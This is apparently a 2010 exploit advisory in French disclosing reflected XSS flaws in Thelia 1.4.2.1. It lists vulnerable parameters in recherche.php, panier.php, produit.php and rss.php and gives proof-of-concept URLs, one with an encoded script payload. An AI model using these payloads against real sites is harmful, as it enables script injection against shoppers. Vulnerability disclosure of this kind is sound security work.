# Exploit Title: Thelia
# Date: 17/01/2010
# Author: EsSandRe
# Software Link: http://www.thelia.fr/fichiers/thelia_1.4.2.1.zip
# Version: 1.4.2.1
# Tested on: /


Vulnérabilité XSS au niveau de la variable 'motcle' de type POST

http://localhost/recherche.php

Une deuxième au niveau de la variable "ref" dans le fichier panier.php ->

http://localhost/panier.php?action=ajouter&ref=[XSS]
http://localhost/panier.php?action=ajouter&ref=">

Pareil pour le fichier produit.php ->

http://localhost/produit.php?ref=[XSS]
http://localhost/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1

Et même chose pour rss.php ->

http://localhost/rss.php?ref=[XSS]
http://localhost/rss.php?ref=">&id_rubrique=


<Greetz>

Frf2,Stink',SheitaN,Metropolis,PhOeNiX95,Az£L Z£L and all others i forgot ;)

</Greetz>


________________________________
Vous cherchez l'intégrale des clips de Michael Jackson ? Bing ! Trouvez !<http://www.bing.com/videos/search?q=Michael+Jackson&FORM=MVDE6>